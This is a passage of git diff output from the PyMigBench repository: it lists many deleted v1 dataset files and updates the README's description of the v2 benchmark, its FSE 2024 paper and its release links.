v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.source.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.target.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.diff delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.source.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.target.py delete mode 100644 
v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.target.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.diff delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.source.py delete mode 100644 v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.target.py delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.diff delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.source.py delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.target.py delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.diff delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.source.py delete mode 100644 v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.target.py delete mode 100644 v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.diff delete mode 100644 
v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.source.py delete mode 100644 v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.target.py delete mode 100644 v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.diff delete mode 100644 v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.source.py delete mode 100644 v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.target.py delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.diff delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.source.py delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.target.py delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.diff delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.source.py delete mode 100644 v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.target.py delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.diff delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.source.py delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.target.py delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.diff delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.source.py delete mode 100644 v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.target.py delete mode 100644 v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.diff delete mode 100644 v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.source.py delete mode 100644 v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$about.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$about.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$about.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$design.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$design.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$design.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.diff delete mode 100644 
v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.target.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.diff delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.source.py delete mode 100644 v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.target.py delete mode 100644 v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.diff delete mode 100644 v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.source.py delete mode 100644 v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.target.py delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.diff delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.source.py delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.target.py delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.diff delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.source.py delete mode 100644 v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.target.py delete mode 100644 v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.diff delete mode 100644 v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.source.py delete mode 100644 v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.target.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.target.py delete mode 100644 
v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.diff delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.source.py delete mode 100644 v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.target.py delete mode 100644 v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.diff delete mode 100644 v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.source.py delete mode 100644 v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.target.py delete mode 100644 v1/data/libpair/appdirs,platformdirs.yaml delete mode 100644 v1/data/libpair/argparse,configargparse.yaml delete mode 100644 v1/data/libpair/attr,attrs.yaml delete mode 100644 v1/data/libpair/celery,rq.yaml delete mode 100644 v1/data/libpair/cheetah,cheetah3.yaml delete mode 100644 v1/data/libpair/dataproperty,typepy.yaml delete mode 100644 v1/data/libpair/django-registration,django-registration-redux.yaml delete mode 100644 v1/data/libpair/django-rest-swagger,drf-yasg.yaml delete mode 100644 v1/data/libpair/dotenv,python-dotenv.yaml delete mode 100644 v1/data/libpair/eventlet,gevent.yaml delete mode 100644 v1/data/libpair/flask,fastapi.yaml delete mode 100644 v1/data/libpair/flask,quart.yaml delete mode 100644 v1/data/libpair/flask,uvicorn.yaml delete mode 100644 v1/data/libpair/flask-restful,flask-restplus.yaml delete mode 100644 v1/data/libpair/flask-restplus,flask-restx.yaml delete mode 100644 v1/data/libpair/flask-security,flask-security-too.yaml delete mode 100644 v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml delete mode 100644 v1/data/libpair/gcloud-aio-core,aiohttp.yaml delete mode 100644 v1/data/libpair/gevent,eventlet.yaml delete mode 100644 v1/data/libpair/gunicorn,waitress.yaml delete mode 100644 v1/data/libpair/huey,celery.yaml delete mode 100644 v1/data/libpair/jwt,pyjwt.yaml delete mode 100644 v1/data/libpair/kafka-python,confluent-kafka.yaml delete mode 100644 v1/data/libpair/keras,torch.yaml delete mode 100644 v1/data/libpair/lockfile,fasteners.yaml delete mode 100644 v1/data/libpair/logbook,loguru.yaml delete mode 100644 v1/data/libpair/magic,python-magic.yaml delete mode 100644 v1/data/libpair/mysql-python,mysqlclient.yaml delete mode 100644 v1/data/libpair/mysql-python,pymysql.yaml delete mode 100644 v1/data/libpair/mysqlclient,psycopg2.yaml delete mode 100644 v1/data/libpair/openpyxl,xlsxwriter.yaml delete mode 100644 v1/data/libpair/pandas,numpy.yaml delete mode 100644 v1/data/libpair/pil,pillow.yaml delete mode 100644 v1/data/libpair/pillow,torchvision.yaml delete mode 100644 v1/data/libpair/py-bcrypt,bcrypt.yaml delete mode 100644 v1/data/libpair/pycrypto,cryptography.yaml delete mode 100644 v1/data/libpair/pycrypto,pycryptodome.yaml delete mode 100644 v1/data/libpair/pycryptodome,pycryptodomex.yaml delete mode 100644 v1/data/libpair/pymilvus-orm,pymilvus.yaml delete mode 100644 v1/data/libpair/pyqt5,pyside6.yaml delete mode 100644 v1/data/libpair/python-ldap,ldap3.yaml delete mode 100644 v1/data/libpair/python-social-auth,social-auth-app-django.yaml delete mode 100644 v1/data/libpair/pytz,pendulum.yaml delete mode 100644 v1/data/libpair/pyyaml,ruamel.yaml.yaml delete mode 100644 v1/data/libpair/raven,sentry-sdk.yaml delete mode 100644 v1/data/libpair/requests,aiohttp.yaml delete mode 100644 v1/data/libpair/retrying,tenacity.yaml delete mode 100644 v1/data/libpair/ruamel.yaml,pyyaml.yaml delete mode 100644 
v1/data/libpair/s3cmd,awscli.yaml delete mode 100644 v1/data/libpair/scapy-python3,scapy.yaml delete mode 100644 v1/data/libpair/sklearn,torch.yaml delete mode 100644 v1/data/libpair/slackclient,slack-sdk.yaml delete mode 100644 v1/data/libpair/slugify,python-slugify.yaml delete mode 100644 v1/data/libpair/tensorboard,tensorboardx.yaml delete mode 100644 v1/data/libpair/urllib,urllib3.yaml delete mode 100644 v1/data/libpair/uwsgi,gunicorn.yaml delete mode 100644 v1/data/libpair/websocket-client,tornado.yaml delete mode 100644 v1/data/libpair/xlrd,openpyxl.yaml delete mode 100644 v1/data/libpair/xlsxwriter,openpyxl.yaml delete mode 100644 v1/data/migration/002f5bd_flask,quart.yaml delete mode 100644 v1/data/migration/0171fb9_pil,pillow.yaml delete mode 100644 v1/data/migration/02b064b_pycryptodome,pycryptodomex.yaml delete mode 100644 v1/data/migration/03a9621_s3cmd,awscli.yaml delete mode 100644 v1/data/migration/0411d6a_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/047263b_flask-restful,flask-restplus.yaml delete mode 100644 v1/data/migration/04a5913_pil,pillow.yaml delete mode 100644 v1/data/migration/054d5d2_fuzzywuzzy,rapidfuzz.yaml delete mode 100644 v1/data/migration/08e7ffa_gunicorn,waitress.yaml delete mode 100644 v1/data/migration/0911992_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/0a65bcc_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/0a70f2b_flask,quart.yaml delete mode 100644 v1/data/migration/0d78d19_lockfile,fasteners.yaml delete mode 100644 v1/data/migration/0df86b5_logbook,loguru.yaml delete mode 100644 v1/data/migration/12e3e80_ruamel.yaml,pyyaml.yaml delete mode 100644 v1/data/migration/14388c3_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/1476b62_python-social-auth,social-auth-app-django.yaml delete mode 100644 v1/data/migration/19dde42_pycryptodome,pycryptodomex.yaml delete mode 100644 v1/data/migration/1c574c1_requests,aiohttp.yaml delete mode 100644 v1/data/migration/1d8923a_requests,aiohttp.yaml delete mode 100644 v1/data/migration/22cc3f0_flask,quart.yaml delete mode 100644 v1/data/migration/24a848d_flask,fastapi.yaml delete mode 100644 v1/data/migration/24a848d_flask,uvicorn.yaml delete mode 100644 v1/data/migration/26c8e74_dataproperty,typepy.yaml delete mode 100644 v1/data/migration/27e2a46_pillow,torchvision.yaml delete mode 100644 v1/data/migration/2960ec6_argparse,configargparse.yaml delete mode 100644 v1/data/migration/2adc6a9_xlrd,openpyxl.yaml delete mode 100644 v1/data/migration/2c40713_pytz,pendulum.yaml delete mode 100644 v1/data/migration/2d9cf64_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/2fc0f26_pil,pillow.yaml delete mode 100644 v1/data/migration/311c7ce_logbook,loguru.yaml delete mode 100644 v1/data/migration/31212eb_pil,pillow.yaml delete mode 100644 v1/data/migration/33c7a3f_pytz,pendulum.yaml delete mode 100644 v1/data/migration/356ce56_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/35ae8f3_mysql-python,mysqlclient.yaml delete mode 100644 v1/data/migration/35d8144_urllib,urllib3.yaml delete mode 100644 v1/data/migration/3abbc43_flask,fastapi.yaml delete mode 100644 v1/data/migration/3abbc43_flask,uvicorn.yaml delete mode 100644 v1/data/migration/3f786f4_uwsgi,gunicorn.yaml delete mode 100644 v1/data/migration/432afa4_jwt,pyjwt.yaml delete mode 100644 v1/data/migration/4377d67_django-rest-swagger,drf-yasg.yaml delete mode 100644 v1/data/migration/43e8ec2_celery,rq.yaml delete mode 100644 v1/data/migration/45d94dd_gcloud-aio-core,aiohttp.yaml delete mode 
100644 v1/data/migration/45fac3c_dataproperty,typepy.yaml delete mode 100644 v1/data/migration/472f336_xlsxwriter,openpyxl.yaml delete mode 100644 v1/data/migration/49cf693_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/4ad53b5_py-bcrypt,bcrypt.yaml delete mode 100644 v1/data/migration/4c3400a_pil,pillow.yaml delete mode 100644 v1/data/migration/4fc081b_keras,torch.yaml delete mode 100644 v1/data/migration/50b7bae_mysqlclient,psycopg2.yaml delete mode 100644 v1/data/migration/5169173_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/51f2688_gevent,eventlet.yaml delete mode 100644 v1/data/migration/528b986_jwt,pyjwt.yaml delete mode 100644 v1/data/migration/5393290_pil,pillow.yaml delete mode 100644 v1/data/migration/53f2073_requests,aiohttp.yaml delete mode 100644 v1/data/migration/547f6d9_lockfile,fasteners.yaml delete mode 100644 v1/data/migration/56e3253_python-ldap,ldap3.yaml delete mode 100644 v1/data/migration/57d12c4_openpyxl,xlsxwriter.yaml delete mode 100644 v1/data/migration/58237dc_mysql-python,pymysql.yaml delete mode 100644 v1/data/migration/5924dc0_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/598f275_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/59d8319_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/5a842ae_kafka-python,confluent-kafka.yaml delete mode 100644 v1/data/migration/5c76c96_xlrd,openpyxl.yaml delete mode 100644 v1/data/migration/5cb810e_pil,pillow.yaml delete mode 100644 v1/data/migration/5ded32a_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/5eb6909_eventlet,gevent.yaml delete mode 100644 v1/data/migration/5f2c76c_py-bcrypt,bcrypt.yaml delete mode 100644 v1/data/migration/5f4d92a_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/633e7d1_gevent,eventlet.yaml delete mode 100644 v1/data/migration/6b0f04a_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/6b10345_kafka-python,confluent-kafka.yaml delete mode 100644 v1/data/migration/6b629d0_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/6e7ee63_requests,aiohttp.yaml delete mode 100644 v1/data/migration/70b3abc_mysql-python,pymysql.yaml delete mode 100644 v1/data/migration/71aff3a_retrying,tenacity.yaml delete mode 100644 v1/data/migration/728f86e_django-rest-swagger,drf-yasg.yaml delete mode 100644 v1/data/migration/7811c8f_eventlet,gevent.yaml delete mode 100644 v1/data/migration/7ba8676_logbook,loguru.yaml delete mode 100644 v1/data/migration/7ea7ddb_flask,quart.yaml delete mode 100644 v1/data/migration/813214e_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/85d50bb_pil,pillow.yaml delete mode 100644 v1/data/migration/86244b6_pyqt5,pyside6.yaml delete mode 100644 v1/data/migration/8778a80_pil,pillow.yaml delete mode 100644 v1/data/migration/87a5671_xlrd,openpyxl.yaml delete mode 100644 v1/data/migration/89b64c6_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/89c7afc_pymilvus-orm,pymilvus.yaml delete mode 100644 v1/data/migration/8d0ec68_retrying,tenacity.yaml delete mode 100644 v1/data/migration/8ef3b62_flask-restful,flask-restplus.yaml delete mode 100644 v1/data/migration/902b66d_pil,pillow.yaml delete mode 100644 v1/data/migration/9291b54_pycryptodome,pycryptodomex.yaml delete mode 100644 v1/data/migration/936761f_dataproperty,typepy.yaml delete mode 100644 v1/data/migration/963f347_gcloud-aio-core,aiohttp.yaml delete mode 100644 v1/data/migration/9abf7b1_slackclient,slack-sdk.yaml delete mode 100644 
v1/data/migration/9c85d66_pil,pillow.yaml delete mode 100644 v1/data/migration/a4c347a_eventlet,gevent.yaml delete mode 100644 v1/data/migration/a50812d_flask-security,flask-security-too.yaml delete mode 100644 v1/data/migration/a5c04bb_requests,aiohttp.yaml delete mode 100644 v1/data/migration/a688034_flask-restplus,flask-restx.yaml delete mode 100644 v1/data/migration/a7375cc_celery,rq.yaml delete mode 100644 v1/data/migration/a7f4c3f_pymilvus-orm,pymilvus.yaml delete mode 100644 v1/data/migration/aa607bd_flask,quart.yaml delete mode 100644 v1/data/migration/ab4e5fd_requests,aiohttp.yaml delete mode 100644 v1/data/migration/ae216dd_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/b19aae1_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/b2c9313_requests,aiohttp.yaml delete mode 100644 v1/data/migration/b687d20_huey,celery.yaml delete mode 100644 v1/data/migration/b86b375_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/b955ac9_ruamel.yaml,pyyaml.yaml delete mode 100644 v1/data/migration/b9b65c0_pyyaml,ruamel.yaml.yaml delete mode 100644 v1/data/migration/baca6bb_urllib,urllib3.yaml delete mode 100644 v1/data/migration/bbeb755_scapy-python3,scapy.yaml delete mode 100644 v1/data/migration/bed73dc_urllib,urllib3.yaml delete mode 100644 v1/data/migration/c08ec7a_huey,celery.yaml delete mode 100644 v1/data/migration/c77913a_eventlet,gevent.yaml delete mode 100644 v1/data/migration/c7c5a13_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/cbaf252_python-ldap,ldap3.yaml delete mode 100644 v1/data/migration/cc47b42_python-ldap,ldap3.yaml delete mode 100644 v1/data/migration/cdaff15_pycrypto,cryptography.yaml delete mode 100644 v1/data/migration/cdb6679_pil,pillow.yaml delete mode 100644 v1/data/migration/cec78f4_pil,pillow.yaml delete mode 100644 v1/data/migration/cf856c0_gevent,eventlet.yaml delete mode 100644 v1/data/migration/d10cb16_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/d15540f_gcloud-aio-core,aiohttp.yaml delete mode 100644 v1/data/migration/d3a9a16_requests,aiohttp.yaml delete mode 100644 v1/data/migration/d3bedb7_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/d4119a0_flask-restful,flask-restplus.yaml delete mode 100644 v1/data/migration/d54d772_python-social-auth,social-auth-app-django.yaml delete mode 100644 v1/data/migration/d6cd8df_pyqt5,pyside6.yaml delete mode 100644 v1/data/migration/d707ff6_gevent,eventlet.yaml delete mode 100644 v1/data/migration/d84b166_python-social-auth,social-auth-app-django.yaml delete mode 100644 v1/data/migration/d8dedc7_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/dac43f8_gunicorn,waitress.yaml delete mode 100644 v1/data/migration/db7f132_flask,quart.yaml delete mode 100644 v1/data/migration/dcd48ef_fuzzywuzzy,rapidfuzz.yaml delete mode 100644 v1/data/migration/dd3b266_urllib,urllib3.yaml delete mode 100644 v1/data/migration/dec4ae0_scapy-python3,scapy.yaml delete mode 100644 v1/data/migration/df57533_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/e192ca6_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/e38ec14_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/e418cdc_pil,pillow.yaml delete mode 100644 v1/data/migration/e5073e4_pymilvus-orm,pymilvus.yaml delete mode 100644 v1/data/migration/e6b17da_pycrypto,pycryptodome.yaml delete mode 100644 v1/data/migration/e706486_slackclient,slack-sdk.yaml delete mode 100644 v1/data/migration/e7d4fd5_fuzzywuzzy,rapidfuzz.yaml delete mode 100644 
v1/data/migration/ea23791_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/ee4d526_pyyaml,ruamel.yaml.yaml delete mode 100644 v1/data/migration/f0761b8_scapy-python3,scapy.yaml delete mode 100644 v1/data/migration/f08e9f1_mysql-python,pymysql.yaml delete mode 100644 v1/data/migration/f1120d3_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/f5ba90e_pyyaml,ruamel.yaml.yaml delete mode 100644 v1/data/migration/f6230c7_py-bcrypt,bcrypt.yaml delete mode 100644 v1/data/migration/f69877c_python-ldap,ldap3.yaml delete mode 100644 v1/data/migration/f7d2ea4_raven,sentry-sdk.yaml delete mode 100644 v1/data/migration/f970b54_pil,pillow.yaml delete mode 100644 v1/data/migration/fe6b437_pil,pillow.yaml delete mode 100644 v1/data/migration/fe8e65d_dotenv,python-dotenv.yaml delete mode 100644 v2/code/.idea/.gitignore delete mode 100644 v2/code/.idea/PyMigStat.iml delete mode 100644 v2/code/.idea/inspectionProfiles/Project_Default.xml delete mode 100644 v2/code/.idea/inspectionProfiles/profiles_settings.xml delete mode 100644 v2/code/.idea/misc.xml delete mode 100644 v2/code/.idea/modules.xml delete mode 100644 v2/code/.idea/other.xml delete mode 100644 v2/code/.idea/vcs.xml delete mode 100644 v2/code/README.md delete mode 100644 v2/code/pymigstat/runnables/__init__.py delete mode 100644 v2/code/pymigstat/taxonomy/__init__.py
diff --git a/README.md b/README.md
index 5da97ea..da46f67 100644
--- a/README.md
+++ b/README.md
@@ -1,29 +1,24 @@
 PyMigBench is a benchmark of Python Library Migrations. This repository contains the data and code for the dataset.
-
 ## PyMigBench v2
-This is the latest version of the dataset.
-This includes all data from [PyMigBench v1](#pymigbench-v1) and additional migrations borrowed from the [SALM dataset](https://ieeexplore.ieee.org/document/10123560).
-The data also includes more information per migration-related code change.
-The dataset includes 3,096 migration-related code changes from 335 migrations between 141 analogous library pairs.
-The data is available in the [v2](/v2) directory.
+The current version, PyMigBench-2.0, includes 3,096 migration-related code changes from 335 migrations between 141 analogous library pairs.
+This includes all migrations from [PyMigBench v1](#pymigbench-v1) and additional migrations borrowed from the [SALM dataset](https://ieeexplore.ieee.org/document/10123560).
+The data also includes additional information per migration-related code change compared to v1.
-The paper is published in FSE 2024.
+The dataset is published with the FSE 2024 paper titled *Characterizing Python Library Migrations*.
 We will add the citation info once it is available.
-[Release 2.0.1](https://github.com/ualberta-smr/PyMigBench/releases/v2.0.1) points to the exact dataset linked to the paper.
-We may update the [v2](/v2) directory to correct any mistakes or add more data and it may go out of sync with the paper.
-So, for reproduction of the paper, use the release mentioned above.
-For, the latest data, use the [v2](/v2) directory of the latest version of the repository.
+[Release 2.0.2](https://github.com/ualberta-smr/PyMigBench/releases/v2.0.2) points to the exact dataset linked to the paper.
+The data is also permanently archived in [figshare](https://doi.org/10.6084/m9.figshare.24216858.v2).
+Use either of these links to reproduce the paper.
+We may update this repository to correct any mistakes or add more data, so it may go out of sync with the paper.
+For the latest data, use the [latest release](https://github.com/ualberta-smr/PyMigBench/releases/latest) in this repository.
 ## PyMigBench v1
-The 2023 version of the dataset includes 375 migration-related code changes from 75 migrations between 34 analogous library pairs.
-The data is also available in the [v1](/v1) directory.
-Please visit [the PyMigBench website](https://ualberta-smr.github.io/PyMigBench) for detailed instructions on using PyMigBench v1.
-We recommend using [PyMigBench v2](#pymigbench-v2) for any new research,
-however, if you are going to use this version, please cite the [MSR 2023 paper](https://ieeexplore.ieee.org/abstract/document/10174111) as below.
-[Release 1.0.3](https://github.com/ualberta-smr/PyMigBench/releases/v1.0.3) points to the dataset linked to the paper.
+We recommend using PyMigBench v2 for any new research.
+However, if you want to use the v1 dataset, you should look at [Release 1.0.3](https://github.com/ualberta-smr/PyMigBench/releases/v1.0.3).
+Cite the paper below if you use the v1 dataset.
 ```
 @INPROCEEDINGS{pymigbench,
